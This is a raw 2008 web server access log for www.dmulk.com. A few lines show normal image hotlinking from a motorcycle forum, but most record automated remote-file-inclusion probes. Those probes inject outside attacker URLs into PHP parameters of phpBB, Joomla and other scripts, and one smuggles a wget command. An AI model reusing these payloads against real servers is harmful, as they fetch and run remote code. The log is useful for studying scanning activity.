72.46.202.219 - - [08/Jun/2008:09:47:38 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4382M.JPG HTTP/1.1" 200 88270 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
72.46.202.219 - - [08/Jun/2008:09:47:38 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4383M.JPG HTTP/1.1" 200 88967 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
61.109.250.144 - - [08/Jun/2008:09:47:39 -0700] "GET /logs/access_080207.log/index.php?abs_path=http://www.blackabyss.net/Upload/out/ID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.46.202.219 - - [08/Jun/2008:09:47:40 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4384M.JPG HTTP/1.1" 200 96561 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
72.46.202.219 - - [08/Jun/2008:09:47:40 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4386M.JPG HTTP/1.1" 200 70821 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
72.55.179.18 - - [08/Jun/2008:09:47:41 -0700] "GET /logs/access_080118.log/modules/Forums/admin/admin_smilies.php?phpbb_root_path=http://nittanywhiteout.com/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.46.202.219 - - [08/Jun/2008:09:47:41 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4387M.JPG HTTP/1.1" 200 63059 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
72.55.179.18 - - [08/Jun/2008:09:47:41 -0700] "GET /modules/Forums/admin/admin_smilies.php?phpbb_root_path=http://nittanywhiteout.com/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.55.179.18 - - [08/Jun/2008:09:47:41 -0700] "GET /logs/modules/Forums/admin/admin_smilies.php?phpbb_root_path=http://nittanywhiteout.com/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
61.109.250.144 - - [08/Jun/2008:09:47:42 -0700] "GET /index.php?abs_path=http://www.blackabyss.net/Upload/out/ID.txt??? HTTP/1.1" 200 16860 "-" "libwww-perl/5.805" "www.dmulk.com"
72.46.202.219 - - [08/Jun/2008:09:47:43 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4385M.JPG HTTP/1.1" 200 94524 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
61.109.250.144 - - [08/Jun/2008:09:47:43 -0700] "GET /logs/index.php?abs_path=http://www.blackabyss.net/Upload/out/ID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
140.113.4.81 - - [08/Jun/2008:09:48:32 -0700] "GET /logs//myspeach/jscript.php?my_ms[root]=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
140.113.4.81 - - [08/Jun/2008:09:48:33 -0700] "GET //myspeach/jscript.php?my_ms[root]=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.86.82.202 - - [08/Jun/2008:09:49:32 -0700] "GET /logs/access.log//include/bbs.lib.inc.php?site_path=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.86.82.202 - - [08/Jun/2008:09:49:33 -0700] "GET //include/bbs.lib.inc.php?site_path=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.86.82.202 - - [08/Jun/2008:09:49:33 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.59.184.132 - - [08/Jun/2008:09:49:38 -0700] "GET /logs//auto_check_renewals.php?installed_config_file=http://www.patrioticusa.us/poll/.../arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.59.184.132 - - [08/Jun/2008:09:49:38 -0700] "GET //auto_check_renewals.php?installed_config_file=http://www.patrioticusa.us/poll/.../arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
140.113.4.81 - - [08/Jun/2008:09:49:38 -0700] "GET /logs/access.log/index.php?pagina=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
140.113.4.81 - - [08/Jun/2008:09:49:40 -0700] "GET /index.php?pagina=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 200 16854 "-" "libwww-perl/5.65" "www.dmulk.com"
140.113.4.81 - - [08/Jun/2008:09:49:41 -0700] "GET /logs/index.php?pagina=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
61.109.250.144 - - [08/Jun/2008:09:49:49 -0700] "GET /logs/access_080213.log/index.php?abs_path=http://www.blackabyss.net/Upload/out/ID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.19.188.13 - - [08/Jun/2008:09:49:55 -0700] "GET /logs/access_080106.log//include/bbs.lib.inc.php?site_path=http://www.grupslactancia.info/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.1.10 - - [08/Jun/2008:09:50:31 -0700] "GET /logs/access_080201.log/index.php?pagina=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
69.89.22.139 - - [08/Jun/2008:09:50:33 -0700] "GET //errors.php?error=http://www.lars-geiger.de/ok/components/com_extcalendar/images/minipics/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.22.139 - - [08/Jun/2008:09:50:33 -0700] "GET //errors.php?error=http://www.lars-geiger.de/ok/components/com_extcalendar/images/minipics/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.22.139 - - [08/Jun/2008:09:50:37 -0700] "GET //errors.php?error=http://www.lars-geiger.de/ok/components/com_extcalendar/images/minipics/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
205.234.215.99 - - [08/Jun/2008:09:50:43 -0700] "GET /logs/access_080312.log//errors.php?error=http://www.lars-geiger.de/ok/components/com_extcalendar/images/minipics/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
205.234.215.99 - - [08/Jun/2008:09:50:43 -0700] "GET /logs/access_080312.log//errors.php?error=http://www.lars-geiger.de/ok/components/com_extcalendar/images/minipics/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
80.86.82.202 - - [08/Jun/2008:09:50:57 -0700] "GET /logs/access_080106.log//include/bbs.lib.inc.php?site_path=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.141.56.36 - - [08/Jun/2008:09:50:58 -0700] "GET /logs/index.php?body=http://www.bestpaket.ru/netcat//dump/alba.txt?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.36 - - [08/Jun/2008:09:51:01 -0700] "GET /index.php?body=http://www.bestpaket.ru/netcat//dump/alba.txt?????????? HTTP/1.1" 200 16902 "-" "libwww-perl/5.65" "www.dmulk.com"
85.214.32.233 - - [08/Jun/2008:09:51:19 -0700] "GET /logs//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://www.termotecnia.cl/mb/administrator/components/com_x-shop/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.1.10 - - [08/Jun/2008:09:51:20 -0700] "GET /logs/access_080220.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
85.214.32.233 - - [08/Jun/2008:09:51:20 -0700] "GET //FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://www.termotecnia.cl/mb/administrator/components/com_x-shop/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.1.10 - - [08/Jun/2008:09:51:20 -0700] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
87.230.1.10 - - [08/Jun/2008:09:51:21 -0700] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
140.113.4.81 - - [08/Jun/2008:09:51:43 -0700] "GET /logs/access_080220.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
140.113.4.81 - - [08/Jun/2008:09:51:44 -0700] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
140.113.4.81 - - [08/Jun/2008:09:51:44 -0700] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
205.234.215.99 - - [08/Jun/2008:09:51:59 -0700] "GET //errors.php?error=http://www.lars-geiger.de/ok/components/com_extcalendar/images/minipics/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
205.234.215.99 - - [08/Jun/2008:09:51:59 -0700] "GET //errors.php?error=http://www.lars-geiger.de/ok/components/com_extcalendar/images/minipics/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
87.230.1.10 - - [08/Jun/2008:09:52:09 -0700] "GET /logs/access.log//include/bbs.lib.inc.php?site_path=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
87.230.1.10 - - [08/Jun/2008:09:52:10 -0700] "GET //include/bbs.lib.inc.php?site_path=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
87.230.1.10 - - [08/Jun/2008:09:52:10 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
220.162.238.35 - - [08/Jun/2008:09:52:24 -0700] "GET //admin/index.php?o=http://4wdnews.com.au/files/tol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [08/Jun/2008:09:52:45 -0700] "GET /logs/access.log//errors.php?error=http://gaugele.net//images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [08/Jun/2008:09:52:45 -0700] "GET //errors.php?error=http://gaugele.net//images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.194.149.215 - - [08/Jun/2008:09:52:45 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.194.149.215 - - [08/Jun/2008:09:52:45 -0700] "GET /logs/access_071219.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.194.149.215 - - [08/Jun/2008:09:52:45 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.194.149.215 - - [08/Jun/2008:09:52:45 -0700] "GET /logs/access_071220.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
79.171.18.36 - - [08/Jun/2008:09:52:45 -0700] "GET /logs//errors.php?error=http://gaugele.net//images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.201.218.158 - - [08/Jun/2008:09:53:02 -0700] "GET /logs/access.log//phphtml.php?htmlclass_path=wget%20http://hrpc.net/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:53:03 -0700] "GET /bikes/dteel/2008-05-30/IMG_4639M.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/showthread.php?t=42196" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "www.dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:53:03 -0700] "GET /bikes/dteel/2008-05-30/IMG_4636M.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/showthread.php?t=42196" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "www.dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:53:03 -0700] "GET /bikes/dteel/2008-05-30/IMG_4644M.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/showthread.php?t=42196" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "www.dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:53:03 -0700] "GET /bikes/dteel/2008-05-30/IMG_4646M.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/showthread.php?t=42196" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "www.dmulk.com"
87.230.1.10 - - [08/Jun/2008:09:53:23 -0700] "GET /logs/access_080216.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
84.246.21.79 - - [08/Jun/2008:09:53:29 -0700] "GET /logs//errors.php?error=http://www.lars-geiger.de/ok/components/com_extcalendar/images/minipics/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.246.21.79 - - [08/Jun/2008:09:53:29 -0700] "GET //errors.php?error=http://www.lars-geiger.de/ok/components/com_extcalendar/images/minipics/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.85.201.66 - - [08/Jun/2008:09:53:38 -0700] "GET /logs/access_080118.log/inc/cmses/aedatingCMS.php?dir[inc]=http://trendbiz.ro/user_media/logo/images/bid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.201.66 - - [08/Jun/2008:09:53:38 -0700] "GET /inc/cmses/aedatingCMS.php?dir[inc]=http://trendbiz.ro/user_media/logo/images/bid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.201.66 - - [08/Jun/2008:09:53:38 -0700] "GET /logs/inc/cmses/aedatingCMS.php?dir[inc]=http://trendbiz.ro/user_media/logo/images/bid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.194.149.215 - - [08/Jun/2008:09:53:41 -0700] "GET /logs/access_071212.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
87.230.1.10 - - [08/Jun/2008:09:53:49 -0700] "GET /logs/access_080106.log//include/bbs.lib.inc.php?site_path=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
140.113.4.81 - - [08/Jun/2008:09:53:55 -0700] "GET /logs/access_080216.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
79.171.18.36 - - [08/Jun/2008:09:54:08 -0700] "GET /logs//errors.php?error=http://gaugele.net//images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [08/Jun/2008:09:54:08 -0700] "GET //errors.php?error=http://gaugele.net//images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
130.242.82.146 - - [08/Jun/2008:09:54:09 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.it-history.net/cgi/idscan3?? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
130.242.82.146 - - [08/Jun/2008:09:54:10 -0700] "GET /phphtml.php?htmlclass_path=http://www.it-history.net/cgi/idscan3?? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.80.93.168 - - [08/Jun/2008:09:54:16 -0700] "GET /logs/access_080326.log//playing.php?commonpath=http://www.autodelen.net/beelden/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
66.80.93.168 - - [08/Jun/2008:09:54:17 -0700] "GET //playing.php?commonpath=http://www.autodelen.net/beelden/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
66.80.93.168 - - [08/Jun/2008:09:54:17 -0700] "GET /logs//playing.php?commonpath=http://www.autodelen.net/beelden/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
130.242.82.146 - - [08/Jun/2008:09:54:24 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.it-history.net/cgi/idscan3?? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
140.113.4.81 - - [08/Jun/2008:09:54:24 -0700] "GET /logs/access_080201.log/index.php?pagina=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
193.111.11.7 - - [08/Jun/2008:09:54:32 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.137.18 - - [08/Jun/2008:09:54:34 -0700] "GET //include/bbs.lib.inc.php?site_path=http://www.trobur.no/media/bbs?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.108.66.182 - - [08/Jun/2008:09:54:38 -0700] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.182 - - [08/Jun/2008:09:54:38 -0700] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.237.236.11 - - [08/Jun/2008:09:54:43 -0700] "GET //skin/zero_vote/error.php?dir=http://www.cdvmbienesraices.com.mx/images/html_f2.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
70.86.5.10 - - [08/Jun/2008:09:54:44 -0700] "GET /logs/access_080322.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/dinarisma/new.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.5.10 - - [08/Jun/2008:09:54:44 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/dinarisma/new.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.22.189 - - [08/Jun/2008:09:54:52 -0700] "GET /logs/access_080521.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
80.249.116.19 - - [08/Jun/2008:09:54:58 -0700] "GET /logs/access_080312.log/index.php?redir=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.85.201.66 - - [08/Jun/2008:09:55:00 -0700] "GET /inc/cmses/aedatingCMS.php?dir[inc]=http://trendbiz.ro/user_media/logo/images/bid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.55.179.18 - - [08/Jun/2008:09:55:10 -0700] "GET /modules/Forums/admin/admin_smilies.php?phpbb_root_path=http://nittanywhiteout.com/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
79.171.18.36 - - [08/Jun/2008:09:55:17 -0700] "GET /logs/access_080117.log//errors.php?error=http://gaugele.net//images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [08/Jun/2008:09:55:18 -0700] "GET //errors.php?error=http://gaugele.net//images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [08/Jun/2008:09:55:18 -0700] "GET /logs//errors.php?error=http://gaugele.net//images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.128.131.80 - - [08/Jun/2008:09:55:21 -0700] "GET /logs/index1.php?dat=http://www.freelance.eu/graphics/robot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.128.131.80 - - [08/Jun/2008:09:55:21 -0700] "GET /index1.php?dat=http://www.freelance.eu/graphics/robot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
79.171.18.36 - - [08/Jun/2008:09:55:22 -0700] "GET /logs/access_080215.log//errors.php?error=http://gaugele.net//images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.113.4.81 - - [08/Jun/2008:09:55:36 -0700] "GET /logs/access.log//include/bbs.lib.inc.php?site_path=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.59.184.132 - - [08/Jun/2008:09:55:36 -0700] "GET /logs//auto_check_renewals.php?installed_config_file=http://www.patrioticusa.us/poll/.../arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.59.184.132 - - [08/Jun/2008:09:55:36 -0700] "GET //auto_check_renewals.php?installed_config_file=http://www.patrioticusa.us/poll/.../arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
140.113.4.81 - - [08/Jun/2008:09:55:36 -0700] "GET //include/bbs.lib.inc.php?site_path=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
140.113.4.81 - - [08/Jun/2008:09:55:36 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
140.113.4.81 - - [08/Jun/2008:09:55:37 -0700] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
140.113.4.81 - - [08/Jun/2008:09:55:38 -0700] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.246.21.79 - - [08/Jun/2008:09:55:40 -0700] "GET /logs/access.log//errors.php?error=http://www.lars-geiger.de/ok/components/com_extcalendar/images/minipics/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.246.21.79 - - [08/Jun/2008:09:55:40 -0700] "GET //errors.php?error=http://www.lars-geiger.de/ok/components/com_extcalendar/images/minipics/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.246.21.79 - - [08/Jun/2008:09:55:41 -0700] "GET /logs//errors.php?error=http://www.lars-geiger.de/ok/components/com_extcalendar/images/minipics/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.69.95.221 - - [08/Jun/2008:09:55:57 -0700] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
195.69.95.221 - - [08/Jun/2008:09:55:57 -0700] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:56:00 -0700] "GET /bikes/dteel/2008-05-30/IMG_4636M.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/newreply.php?do=newreply&p=468839" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "www.dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:56:00 -0700] "GET /bikes/dteel/2008-05-30/IMG_4639M.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/newreply.php?do=newreply&p=468839" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "www.dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:56:00 -0700] "GET /bikes/dteel/2008-05-30/IMG_4646M.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/newreply.php?do=newreply&p=468839" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "www.dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:56:00 -0700] "GET /bikes/dteel/2008-05-30/IMG_4644M.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/newreply.php?do=newreply&p=468839" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "www.dmulk.com"
194.165.49.171 - - [08/Jun/2008:09:56:03 -0700] "GET //vwar/includes/functions_gb_admin.php?vwar_root=http://scc-team.co.cc/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.16.18 - - [08/Jun/2008:09:56:04 -0700] "GET /logs/access.log/NuclearBB/tasks/send_queued_emails.php?root_path=http://www.safonov.sumy.ua/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.16.18 - - [08/Jun/2008:09:56:15 -0700] "GET /logs/NuclearBB/tasks/send_queued_emails.php?root_path=http://www.safonov.sumy.ua/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.80.93.168 - - [08/Jun/2008:09:56:20 -0700] "GET /logs/access_080325.log//playing.php?commonpath=http://www.autodelen.net/beelden/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
205.234.219.245 - - [08/Jun/2008:09:56:27 -0700] "GET /logs//path/comments-display-tpl.php?config[comments_form_tpl]=http://trendbiz.ro/user_media/logo/images/bid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
